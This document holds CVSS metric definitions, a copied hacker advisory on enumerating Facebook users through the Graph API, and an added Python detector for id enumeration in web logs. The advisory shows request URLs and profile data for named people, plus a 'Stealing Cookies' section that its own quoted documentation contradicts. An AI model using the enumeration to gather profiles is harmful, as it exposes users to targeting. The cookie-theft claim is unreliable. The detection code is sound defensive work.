Attack Vector (AV): Network
The vulnerable system is bound to the network stack and the set of possible attackers extends beyond the other options listed below, up to and including the entire Internet. Such a vulnerability is often termed "remotely exploitable" and can be thought of as an attack being exploitable at the protocol level one or more network hops away (e.g., across one or more routers). An example of a network attack is an attacker causing a denial of service by sending a specially crafted TCP packet across a wide area network (e.g., CVE-2004-0230).
Attack Complexity (AC): Low
The attacker must take no measurable action to exploit the vulnerability. The attack requires no target-specific circumvention to exploit the vulnerability. An attacker can expect repeatable success against the vulnerable system.
Privileges Required (PR): None
The attacker is unauthenticated prior to attack, and therefore does not require any access to settings or files of the vulnerable system to carry out an attack.
Scope (S): Unchanged
An exploited vulnerability can only affect resources managed by the same security authority. In the case of a vulnerability in a virtualized environment, an exploited vulnerability in one guest instance would not affect neighboring guest instances.
Confidentiality (C): High
There is total information disclosure, resulting in all data on the system being revealed to the attacker, or there is a possibility of the attacker gaining control over confidential data.
Integrity (I): High
There is a total compromise of system integrity. There is a complete loss of system protection, resulting in the attacker being able to modify any file on the target system.
Availability (A): None
There is no impact on the availability of the system; the attacker does not have the ability to disrupt access to or use of the system.
Below is a copy: Facebook HTTP Graph API Users ID (and others..) Information Disclosure
# Exploit Title :
Facebook HTTP Graph API Users ID (and others..) Information Disclosure -OAuthException- and Vulnerable (http) to Brute Force Attack
# *Vendor*: Facebook.com http://graph.facebook.com
# Author: Juan Carlos Garcia (@secnight)(nightsec) ;)
# Blog: http://hackingmadrid.blogspot.com
http://blog.0verl0ad.com/
http://highsec.es
BRIEF DESCRIPTION
******************
The Graph API is the primary way that data is retrieved from or posted to Facebook. The Getting Started Guide contains an overview of the basics of the API, walks you through using the Graph API Explorer, shows you how names work, how permissions work, what connections are, and puts it all together so the rest of this reference makes sense.
Users Information Disclosure
**********************
Anyone can access the data of ANY user, due to the information released by the "Graph API" because of the functionality that has been given to this API for developers.
The "excess" functionality provided in this API exposes users' data without any need for it, and lets any malicious attacker compile information (information gathering) about the target.
It is possible to identify people by their id, as will be seen in the proof of concept, and the insecure HTTP protocol also makes it vulnerable to a brute force attack.
Proof Of Concept (PoC)
First
***
http://graph.facebook.com/
As you can see, we have a "GraphMethodException":
{
"error": {
"message": "Unsupported get request",
"type": "GraphMethodException",
"code": 100
}
}
Creating an OAuthException
**********************
http://graph.facebook.com/00000000000000000000000000000000000000000000
{
"error": {
"message": "(#803) Some of the aliases you requested do not exist: 00000000000000000000000000000000000",
"type": "OAuthException",
"code": 803
}
}
My Profile ¡!! ;)
http://graph.facebook.com/ADMIN.CANGREJOS
{
"id": "100001678510102",
"name": "Juan Carlos Garcia",
"first_name": "Juan Carlos",
"last_name": "Garcia",
"username": "ADMIN.CANGREJOS",
"gender": "male",
"locale": "es_ES"
}
And we can also do the REVERSE because we have the id..
http://graph.facebook.com/100001678510102
Mark Zuckerberg CEO Facebook
http://graph.facebook.com/zuck
{
"id": "4",
"name": "Mark Zuckerberg",
"first_name": "Mark",
"last_name": "Zuckerberg",
"link": "https://www.facebook.com/zuck",
"username": "zuck",
"gender": "male",
"locale": "en_US"
}
--> WTF???? … The number 4 .. Who is id 1,2,3 ????????
The Reverse
http://graph.facebook.com/4
COOKIES
A list of cookies that were set for the user, as represented in FQL (Facebook Query Language).
Columns
Name     Type
expires  timestamp
name     string
path     string
uid      numeric string
value    string
To access this table you only need a valid access token with basic permissions.
Facebook Login makes it easy to connect with users on your app or website. You can use several methods in the JavaScript or mobile SDKs to speed up the registration process and build a functional system in minutes.
Stealing Cookies
You only need the following SQL query to extract the cookie:
SELECT ... FROM cookies WHERE uid = A
Note: Additional filters on other columns can be specified but they may make the query less efficient.
/Admin
http://graph.facebook.com/admin/
{
"id": "100005597474065",
"name": "AD Min",
"first_name": "AD",
"last_name": "Min",
"link": "https://www.facebook.com/ad.min",
"username": "ad.min",
"gender": "male",
"locale": "ru_RU"
}
Procedure: Open the links given above and you can play .. No hack, No fun ;)
Special THANKS: Eduardo Arriols Nuñez .. very good newbie ;)
Live Free or Die Hacking
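The advisory above shows that a profile endpoint answering plain numeric ids lets a client walk the id space over HTTP. From the defender's side, that activity leaves a recognisable trace in web server logs: one client requesting many distinct numeric paths, often consecutive, in a short window. The following Python is an added example (not part of the advisory, and not Facebook's tooling) that parses constructed combined-format access log lines and flags clients exhibiting that pattern; the log format, the 5-minute window, the 5-id threshold and the sample addresses and ids are all assumptions chosen for illustration.

```python
"""Flag id-enumeration against a numeric-id profile endpoint from access logs.

Added example, not part of the advisory. The log lines below are constructed
(RFC 5737 test addresses, made-up ids); the thresholds are assumptions.
"""
import re
from collections import defaultdict
from datetime import datetime, timedelta

# Constructed sample traffic in Apache/nginx "combined" format (not real logs).
SAMPLE_LOG = """\
203.0.113.7 - - [10/Oct/2023:13:55:36 +0000] "GET /100000000000100 HTTP/1.1" 200 312 "-" "curl/7.88"
203.0.113.7 - - [10/Oct/2023:13:55:37 +0000] "GET /100000000000101 HTTP/1.1" 200 298 "-" "curl/7.88"
203.0.113.7 - - [10/Oct/2023:13:55:37 +0000] "GET /100000000000102 HTTP/1.1" 404 95 "-" "curl/7.88"
203.0.113.7 - - [10/Oct/2023:13:55:38 +0000] "GET /100000000000103 HTTP/1.1" 200 301 "-" "curl/7.88"
203.0.113.7 - - [10/Oct/2023:13:55:39 +0000] "GET /100000000000104 HTTP/1.1" 200 310 "-" "curl/7.88"
203.0.113.7 - - [10/Oct/2023:13:55:40 +0000] "GET /100000000000105 HTTP/1.1" 200 305 "-" "curl/7.88"
198.51.100.9 - - [10/Oct/2023:13:56:02 +0000] "GET /zuck HTTP/1.1" 200 280 "-" "Mozilla/5.0"
198.51.100.9 - - [10/Oct/2023:13:56:05 +0000] "GET /4 HTTP/1.1" 200 280 "-" "Mozilla/5.0"
192.0.2.5 - - [10/Oct/2023:13:57:10 +0000] "GET /100000000000777 HTTP/1.1" 200 300 "-" "Mozilla/5.0"
192.0.2.5 - - [10/Oct/2023:14:20:10 +0000] "GET /100000000000778/ HTTP/1.1" 200 300 "-" "Mozilla/5.0"
this line is deliberately malformed and must be skipped
"""

LINE_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>\S+) (?P<path>\S+) [^"]*" (?P<status>\d{3})'
)
TS_FMT = "%d/%b/%Y:%H:%M:%S %z"
# A path that is nothing but a numeric id (optionally with a trailing slash).
NUMERIC_ID = re.compile(r"^/(\d{1,20})/?$")


def parse_line(line: str):
    """Return {ip, ts, method, path, status} for a combined-format line, else None."""
    m = LINE_RE.match(line)
    if not m:
        return None
    return {
        "ip": m["ip"],
        "ts": datetime.strptime(m["ts"], TS_FMT),
        "method": m["method"],
        "path": m["path"],
        "status": int(m["status"]),
    }


def longest_run(sorted_ids) -> int:
    """Length of the longest run of consecutive integers in an ascending list."""
    best = run = 1 if sorted_ids else 0
    for a, b in zip(sorted_ids, sorted_ids[1:]):
        run = run + 1 if b == a + 1 else 1
        best = max(best, run)
    return best


def find_enumerators(log_text: str, window=timedelta(minutes=5),
                     min_ids: int = 5) -> dict:
    """Clients that fetch at least `min_ids` distinct numeric ids within `window`.

    Both 200 and 404 responses count: a miss still tells the prober the id is
    unused, so error responses are part of the enumeration signal.
    """
    by_ip = defaultdict(list)
    for line in log_text.splitlines():
        rec = parse_line(line)
        if rec is None:
            continue
        m = NUMERIC_ID.match(rec["path"])
        if m:
            by_ip[rec["ip"]].append((rec["ts"], int(m.group(1))))

    findings = {}
    for ip, events in by_ip.items():
        events.sort()
        start, best = 0, 0
        # Sliding window over time-ordered requests, counting distinct ids.
        for end in range(len(events)):
            while events[end][0] - events[start][0] > window:
                start += 1
            best = max(best, len({i for _, i in events[start:end + 1]}))
        if best >= min_ids:
            ids = sorted({i for _, i in events})
            findings[ip] = {
                "distinct_ids": len(ids),
                "max_in_window": best,
                "longest_sequential_run": longest_run(ids),
            }
    return findings


if __name__ == "__main__":
    for ip, info in find_enumerators(SAMPLE_LOG).items():
        print(ip, info)
```

On the constructed sample only 203.0.113.7 is reported (six consecutive ids in four seconds); the two browsing clients fall below the threshold. A long sequential run is the strongest indicator, since ordinary users rarely request neighbouring ids; a high distinct-id count with no run is more consistent with a crawler working from a list.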